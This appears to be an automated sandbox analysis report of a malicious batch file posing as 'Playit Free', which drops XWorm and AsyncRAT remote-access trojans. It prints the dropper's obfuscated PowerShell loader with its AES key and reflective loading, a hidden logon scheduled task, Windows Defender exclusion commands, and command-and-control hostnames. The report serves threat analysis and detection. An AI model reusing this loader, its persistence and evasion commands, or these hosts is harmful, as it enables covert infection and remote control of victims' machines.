Analysis
-
max time kernel
146s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
04-07-2024 13:22
Static task
static1
General
-
Target
Playit Free.bat
-
Size
292KB
-
MD5
2bac01a226b5c7b08de93311ab9905d5
-
SHA1
48144153d2ca3d9cc7e27506b3d1923c9d80cc7a
-
SHA256
bf73489935f2d196e04d1eb012f3c8ab16263fb3d005aac58d63322313db1186
-
SHA512
96f50b01f8c69befabbb307c5e4b58e304ec5d8339c9cca4bf927add6ec9f912ca4c87f5e13ec3c34737e47a7ab35d15de32c4b8b84c11e05dccfc9b5ce3f7f6
-
SSDEEP
6144:JLbgUUyQ6VV3W7bmjOk8Cl/iZYwD6rjwY+H+4hjhphHCxsu:JLbgPyQ6z3DOERkDUIHLlJu
Malware Config
Extracted
xworm
super-nearest.gl.at.ply.gg:17835
best-bird.gl.at.ply.gg:27196
wiz.bounceme.net:6000
-
install_file
USB.exe
Extracted
asyncrat
Default
finally-grande.gl.at.ply.gg:25844
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
Detect Xworm Payload 5 IoCs
Processes:
resource yara_rule behavioral1/memory/2124-16-0x00000164E4870000-0x00000164E48B8000-memory.dmp family_xworm behavioral1/memory/4324-54-0x000001F1FC570000-0x000001F1FC58A000-memory.dmp family_xworm C:\Users\Admin\AppData\Local\Temp\mshta.exe family_xworm behavioral1/memory/4068-77-0x0000000000290000-0x00000000002A8000-memory.dmp family_xworm behavioral1/memory/4068-124-0x000000001C060000-0x000000001C06E000-memory.dmp family_xworm -
Async RAT payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/2124-16-0x00000164E4870000-0x00000164E48B8000-memory.dmp family_asyncrat C:\Users\Admin\AppData\Local\Temp\scvhost.exe family_asyncrat -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 23 4324 powershell.exe 32 4324 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 2124 powershell.exe 4060 powershell.exe 4324 powershell.exe 4352 powershell.exe 4112 powershell.exe 3496 powershell.exe 4536 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exemshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation mshta.exe -
Executes dropped EXE 2 IoCs
Processes:
scvhost.exemshta.exepid process 3404 scvhost.exe 4068 mshta.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 19 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 22 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exemshta.exepowershell.exepid process 2124 powershell.exe 2124 powershell.exe 4060 powershell.exe 4060 powershell.exe 4324 powershell.exe 4324 powershell.exe 4536 powershell.exe 4536 powershell.exe 4536 powershell.exe 4352 powershell.exe 4352 powershell.exe 4352 powershell.exe 4112 powershell.exe 4112 powershell.exe 4112 powershell.exe 4068 mshta.exe 4068 mshta.exe 3496 powershell.exe 3496 powershell.exe 3496 powershell.exe 4324 powershell.exe 4324 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2124 powershell.exe Token: SeDebugPrivilege 4060 powershell.exe Token: SeIncreaseQuotaPrivilege 4060 powershell.exe Token: SeSecurityPrivilege 4060 powershell.exe Token: SeTakeOwnershipPrivilege 4060 powershell.exe Token: SeLoadDriverPrivilege 4060 powershell.exe Token: SeSystemProfilePrivilege 4060 powershell.exe Token: SeSystemtimePrivilege 4060 powershell.exe Token: SeProfSingleProcessPrivilege 4060 powershell.exe Token: SeIncBasePriorityPrivilege 4060 powershell.exe Token: SeCreatePagefilePrivilege 4060 powershell.exe Token: SeBackupPrivilege 4060 powershell.exe Token: SeRestorePrivilege 4060 powershell.exe Token: SeShutdownPrivilege 4060 powershell.exe Token: SeDebugPrivilege 4060 powershell.exe Token: SeSystemEnvironmentPrivilege 4060 powershell.exe Token: SeRemoteShutdownPrivilege 4060 powershell.exe Token: SeUndockPrivilege 4060 powershell.exe Token: SeManageVolumePrivilege 4060 powershell.exe Token: 33 4060 powershell.exe Token: 34 4060 powershell.exe Token: 35 4060 powershell.exe Token: 36 4060 powershell.exe Token: SeIncreaseQuotaPrivilege 4060 powershell.exe Token: SeSecurityPrivilege 4060 powershell.exe Token: SeTakeOwnershipPrivilege 4060 powershell.exe Token: SeLoadDriverPrivilege 4060 powershell.exe Token: SeSystemProfilePrivilege 4060 powershell.exe Token: SeSystemtimePrivilege 4060 powershell.exe Token: SeProfSingleProcessPrivilege 4060 powershell.exe Token: SeIncBasePriorityPrivilege 4060 powershell.exe Token: SeCreatePagefilePrivilege 4060 powershell.exe Token: SeBackupPrivilege 4060 powershell.exe Token: SeRestorePrivilege 4060 powershell.exe Token: SeShutdownPrivilege 4060 powershell.exe Token: SeDebugPrivilege 4060 powershell.exe Token: SeSystemEnvironmentPrivilege 4060 powershell.exe Token: SeRemoteShutdownPrivilege 4060 powershell.exe Token: SeUndockPrivilege 4060 powershell.exe Token: SeManageVolumePrivilege 4060 powershell.exe Token: 33 4060 powershell.exe Token: 34 4060 powershell.exe Token: 35 4060 powershell.exe Token: 36 4060 powershell.exe Token: SeIncreaseQuotaPrivilege 4060 powershell.exe Token: SeSecurityPrivilege 4060 powershell.exe Token: SeTakeOwnershipPrivilege 4060 powershell.exe Token: SeLoadDriverPrivilege 4060 powershell.exe Token: SeSystemProfilePrivilege 4060 powershell.exe Token: SeSystemtimePrivilege 4060 powershell.exe Token: SeProfSingleProcessPrivilege 4060 powershell.exe Token: SeIncBasePriorityPrivilege 4060 powershell.exe Token: SeCreatePagefilePrivilege 4060 powershell.exe Token: SeBackupPrivilege 4060 powershell.exe Token: SeRestorePrivilege 4060 powershell.exe Token: SeShutdownPrivilege 4060 powershell.exe Token: SeDebugPrivilege 4060 powershell.exe Token: SeSystemEnvironmentPrivilege 4060 powershell.exe Token: SeRemoteShutdownPrivilege 4060 powershell.exe Token: SeUndockPrivilege 4060 powershell.exe Token: SeManageVolumePrivilege 4060 powershell.exe Token: 33 4060 powershell.exe Token: 34 4060 powershell.exe Token: 35 4060 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
mshta.exepowershell.exepid process 4068 mshta.exe 4324 powershell.exe -
Suspicious use of WriteProcessMemory 26 IoCs
Processes:
cmd.exepowershell.exeWScript.execmd.exepowershell.exemshta.exedescription pid process target process PID 4056 wrote to memory of 1404 4056 cmd.exe cmd.exe PID 4056 wrote to memory of 1404 4056 cmd.exe cmd.exe PID 4056 wrote to memory of 2124 4056 cmd.exe powershell.exe PID 4056 wrote to memory of 2124 4056 cmd.exe powershell.exe PID 2124 wrote to memory of 4060 2124 powershell.exe powershell.exe PID 2124 wrote to memory of 4060 2124 powershell.exe powershell.exe PID 2124 wrote to memory of 4748 2124 powershell.exe WScript.exe PID 2124 wrote to memory of 4748 2124 powershell.exe WScript.exe PID 4748 wrote to memory of 3712 4748 WScript.exe cmd.exe PID 4748 wrote to memory of 3712 4748 WScript.exe cmd.exe PID 3712 wrote to memory of 1044 3712 cmd.exe cmd.exe PID 3712 wrote to memory of 1044 3712 cmd.exe cmd.exe PID 3712 wrote to memory of 4324 3712 cmd.exe powershell.exe PID 3712 wrote to memory of 4324 3712 cmd.exe powershell.exe PID 4324 wrote to memory of 3404 4324 powershell.exe scvhost.exe PID 4324 wrote to memory of 3404 4324 powershell.exe scvhost.exe PID 4324 wrote to memory of 4068 4324 powershell.exe mshta.exe PID 4324 wrote to memory of 4068 4324 powershell.exe mshta.exe PID 4068 wrote to memory of 4536 4068 mshta.exe powershell.exe PID 4068 wrote to memory of 4536 4068 mshta.exe powershell.exe PID 4324 wrote to memory of 4352 4324 powershell.exe powershell.exe PID 4324 wrote to memory of 4352 4324 powershell.exe powershell.exe PID 4068 wrote to memory of 4112 4068 mshta.exe powershell.exe PID 4068 wrote to memory of 4112 4068 mshta.exe powershell.exe PID 4324 wrote to memory of 3496 4324 powershell.exe powershell.exe PID 4324 wrote to memory of 3496 4324 powershell.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Playit Free.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nkzg1mkfrHDUSX6khNCFu2GC0GRW40N8z0jb2WU/2wk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+SIhEEEdUoAvS3C0hLoK1A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $Eejjc=New-Object System.IO.MemoryStream(,$param_var); $rNGlN=New-Object System.IO.MemoryStream; $fjHYd=New-Object System.IO.Compression.GZipStream($Eejjc, [IO.Compression.CompressionMode]::Decompress); $fjHYd.CopyTo($rNGlN); $fjHYd.Dispose(); $Eejjc.Dispose(); $rNGlN.Dispose(); $rNGlN.ToArray();}function execute_function($param_var,$param2_var){ $BawPg=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $DvyFJ=$BawPg.EntryPoint; $DvyFJ.Invoke($null, $param2_var);}$FmsBL = 'C:\Users\Admin\AppData\Local\Temp\Playit Free.bat';$host.UI.RawUI.WindowTitle = $FmsBL;$LeiwM=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($FmsBL).Split([Environment]::NewLine);foreach ($OYikl in $LeiwM) { if ($OYikl.StartsWith('riSZShbqVrDJFHBMOGEs')) { $adCgQ=$OYikl.Substring(20); break; }}$payloads_var=[string[]]$adCgQ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_82_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_82.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_82.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_82.bat" "4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nkzg1mkfrHDUSX6khNCFu2GC0GRW40N8z0jb2WU/2wk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+SIhEEEdUoAvS3C0hLoK1A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $Eejjc=New-Object System.IO.MemoryStream(,$param_var); $rNGlN=New-Object System.IO.MemoryStream; $fjHYd=New-Object System.IO.Compression.GZipStream($Eejjc, [IO.Compression.CompressionMode]::Decompress); $fjHYd.CopyTo($rNGlN); $fjHYd.Dispose(); $Eejjc.Dispose(); $rNGlN.Dispose(); $rNGlN.ToArray();}function execute_function($param_var,$param2_var){ $BawPg=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $DvyFJ=$BawPg.EntryPoint; $DvyFJ.Invoke($null, $param2_var);}$FmsBL = 'C:\Users\Admin\AppData\Roaming\Windows_Log_82.bat';$host.UI.RawUI.WindowTitle = $FmsBL;$LeiwM=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($FmsBL).Split([Environment]::NewLine);foreach ($OYikl in $LeiwM) { if ($OYikl.StartsWith('riSZShbqVrDJFHBMOGEs')) { $adCgQ=$OYikl.Substring(20); break; }}$payloads_var=[string[]]$adCgQ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\scvhost.exe"C:\Users\Admin\AppData\Local\Temp\scvhost.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\mshta.exe"C:\Users\Admin\AppData\Local\Temp\mshta.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\mshta.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'mshta.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=2860,i,2607710392823067546,4648797561512801463,262144 --variations-seed-version --mojo-platform-channel-handle=4012 /prefetch:81⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5661739d384d9dfd807a089721202900b
SHA15b2c5d6a7122b4ce849dc98e79a7713038feac55
SHA25670c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
SHA51281b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
2KB
MD5005bc2ef5a9d890fb2297be6a36f01c2
SHA10c52adee1316c54b0bfdc510c0963196e7ebb430
SHA256342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d
SHA512f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD577d622bb1a5b250869a3238b9bc1402b
SHA1d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD5d65ebc84c6b0b52901fb46f5e2b83ab5
SHA1d036a0c3eb9e1616d0f7f5ca41171060c13a3095
SHA256d45581b0807a0d04a70ec75e3e4575e73f148e5b4e0d3d325dfbd6400a4bfbd1
SHA51288ac232e7702ebd53788cf8429d266ae367111bfccf4bc9d40ead25b552347521458ca60d320e2775b5d2edcaf8501251cb2db68b38dc000ac50463fb80865be
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD512c844ed8342738dacc6eb0072c43257
SHA1b7f2f9e3ec4aaf5e2996720f129cd64887ac91d7
SHA2562afeb7db4e46d3c1524512a73448e9cd0121deec761d8aa54fa9fe8b56df7519
SHA512e3de9103533a69cccc36cd377297ba3ec9bd7a1159e1349d2cc01ab66a88a5a82b4ee3af61fab586a0cdfab915c7408735439fd0462c5c2cc2c787cb0765766a
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_orr2a3kg.dmp.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\mshta.exeFilesize
70KB
MD5c5431c4b11742bc4ab73e896dd47153b
SHA116e6869c71d4ee978dfcc29b48f277f55828a331
SHA256bc404ae20b7085100cd7a7efddb28ce54014309bdbd60a5d57c135d44b950c4a
SHA512888a843e81400b900fb5a36ff171b03149d2719406e778614809cfaaa7e81e2e9deb6807d01ff1cec7ed1db30b585121fc8606d2bc52ffc5fc4d86e9d2b12f37
-
C:\Users\Admin\AppData\Local\Temp\scvhost.exeFilesize
63KB
MD51ca366d46cb1726508257459a9cbbf3f
SHA1183e7cd4165bd195cb05c7e474037f2a22707c67
SHA25676bb01ad0452e2f834661d54744645a14d057be883ad51d2b447f8d6c48d5129
SHA512aec28910c3f2015ea252d9e2c1a497eec8fd3ef0bc4ff0bf42a593f159a3539df8ec7b01487def04099ca68040ec3d484492319b7bfbafedcbd7bcc2627e67be
-
C:\Users\Admin\AppData\Roaming\Windows_Log_82.batFilesize
292KB
MD52bac01a226b5c7b08de93311ab9905d5
SHA148144153d2ca3d9cc7e27506b3d1923c9d80cc7a
SHA256bf73489935f2d196e04d1eb012f3c8ab16263fb3d005aac58d63322313db1186
SHA51296f50b01f8c69befabbb307c5e4b58e304ec5d8339c9cca4bf927add6ec9f912ca4c87f5e13ec3c34737e47a7ab35d15de32c4b8b84c11e05dccfc9b5ce3f7f6
-
C:\Users\Admin\AppData\Roaming\Windows_Log_82.vbsFilesize
114B
MD5e39c831199e0dff67c3230b04f978409
SHA1865806658353cb771d47bbf60c6942f57104c631
SHA2569f35c6f9f6446ee00eb1bb7f9031f113f6c35c0322e0d2ef4ec7f82af7cf6398
SHA512ee355d5bbe6fdffc1f0fd705cb101cc01a41577da058ed3668fb6f0a44063b5f16df3718f4bee5ffcb4c66bec6869101061b87f74618872fd6e2609ee7f85dfd
-
memory/2124-55-0x00007FFF009A0000-0x00007FFF01461000-memory.dmpFilesize
10.8MB
-
memory/2124-14-0x00000164FEE90000-0x00000164FEF06000-memory.dmpFilesize
472KB
-
memory/2124-1-0x00000164E4810000-0x00000164E4832000-memory.dmpFilesize
136KB
-
memory/2124-11-0x00007FFF009A0000-0x00007FFF01461000-memory.dmpFilesize
10.8MB
-
memory/2124-12-0x00007FFF009A0000-0x00007FFF01461000-memory.dmpFilesize
10.8MB
-
memory/2124-16-0x00000164E4870000-0x00000164E48B8000-memory.dmpFilesize
288KB
-
memory/2124-15-0x00000164E4860000-0x00000164E4868000-memory.dmpFilesize
32KB
-
memory/2124-13-0x00000164FEA40000-0x00000164FEA84000-memory.dmpFilesize
272KB
-
memory/2124-0-0x00007FFF009A3000-0x00007FFF009A5000-memory.dmpFilesize
8KB
-
memory/3404-76-0x00000000006D0000-0x00000000006E6000-memory.dmpFilesize
88KB
-
memory/4060-29-0x00007FFF009A0000-0x00007FFF01461000-memory.dmpFilesize
10.8MB
-
memory/4060-27-0x00007FFF009A0000-0x00007FFF01461000-memory.dmpFilesize
10.8MB
-
memory/4060-28-0x00007FFF009A0000-0x00007FFF01461000-memory.dmpFilesize
10.8MB
-
memory/4060-32-0x00007FFF009A0000-0x00007FFF01461000-memory.dmpFilesize
10.8MB
-
memory/4068-77-0x0000000000290000-0x00000000002A8000-memory.dmpFilesize
96KB
-
memory/4068-124-0x000000001C060000-0x000000001C06E000-memory.dmpFilesize
56KB
-
memory/4324-54-0x000001F1FC570000-0x000001F1FC58A000-memory.dmpFilesize
104KB